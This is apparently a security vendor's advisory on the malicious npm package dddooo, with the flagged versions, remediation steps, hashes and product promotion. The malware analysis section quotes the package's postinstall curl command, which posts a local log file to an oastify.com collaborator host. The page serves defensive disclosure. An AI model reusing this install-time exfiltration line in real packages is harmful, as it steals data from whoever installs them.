Which versions of dddooo are malicious?

The following npm versions of dddooo are flagged malicious: 1.0.0, 1.0.1, 1.0.2. Treat any of these as compromised.

How do I remediate dddooo if I installed it?

dddooo is built to steal secrets, so assume every credential the build or runtime could read is compromised. Remove it from your project and lockfile, then rotate ALL exposed secrets — npm/registry tokens, cloud keys, CI/CD secrets, SSH keys, and any .env values — from a known-clean machine. Audit logs for unauthorized use of those credentials.

I already installed dddooo — how do I know if it already compromised me?

If dddooo was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.

Is dddooo part of a known attack campaign?

Yes — dddooo is associated with the IN-MAL-2026-007510, IN-MAL-2026-007512, IN-MAL-2026-007511 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

How do I find dddooo across my projects, lockfiles, and CI pipelines?

Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for dddooo (3 malicious versions). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging dddooo across your stack and pipelines.

Malicious package

dddooonpm

Malicious code in dddooo (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-6460

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall dddooo

What this malware does

package.json declares a postinstall lifecycle script that runs automatically on npm install: curl -X POST -d "$(cat /data/logs/monitor-2026-06-16.log)" http://3dhd6wwmusbh04m22igmzvb4hvnmblza.oastify.com/data. The script reads a file from the installer's filesystem and POSTs its contents over plain HTTP to an attacker-controlled Burp Collaborator (oastify.com) out-of-band interaction subdomain. The package presents itself as a handy string utility functions library, but has empty author/homepage/repository fields and includes a malformed trunls -lae keyword — the library framing is a cover for the install-time exfiltration. No legitimate string-utility package needs to read system log paths or beacon to oastify.com on install.

The OpenSSF Package Analysis project identified 'dddooo' @ 1.0.2 (npm) as malicious.

It is considered malicious because:

The package communicates with a domain associated with malicious activity.
The package executes one or more commands associated with malicious behavior.

Malicious versions

3 flagged

1.0.01.0.11.0.2

Indicators of compromise (SHA-256)

99d97fdc7c59d1871a9f0771694688026d7ee92d4bc37cdd48a52db1d9055246

554ebc4bc4d5915885da6d519c699c7b6c32cdafddd916bdbf9b0f4be039c706

29a1f6b05340c6c5543341f1eb014228ca636936f378ab147b03895c41639d92

31763ebf0ebdd35b636e728b408f41ff8852cddeb34db5e188dc17c8374c6948

Detection & response playbook

Credential / info stealer

Find it
Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for dddooo (3 malicious versions). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging dddooo across your stack and pipelines.
If you installed it — respond
dddooo is built to steal secrets, so assume every credential the build or runtime could read is compromised. Remove it from your project and lockfile, then rotate ALL exposed secrets — npm/registry tokens, cloud keys, CI/CD secrets, SSH keys, and any .env values — from a known-clean machine. Audit logs for unauthorized use of those credentials.
Did it already run?
If dddooo was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.
How O3 protects you
O3 blocks dddooo before install through its supply-chain scanner, and if it has already run, detects and severs the exfiltration or C2 callback at runtime through L7 egress monitoring and eBPF.

Frequently asked questions

No. dddooo on npm has been identified as a malicious package (versions 1.0.0, 1.0.1, 1.0.2 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-007510IN-MAL-2026-007512IN-MAL-2026-007511

References

Credits

Amazon Inspector · finder
OpenSSF: Package Analysis · finder

Detect & block this

O3 blocks dddooo-class packages before install and in CI — and if it already ran, its runtime egress monitoring catches the credential exfiltration and severs the channel.

Malware detection Runtime egress monitoring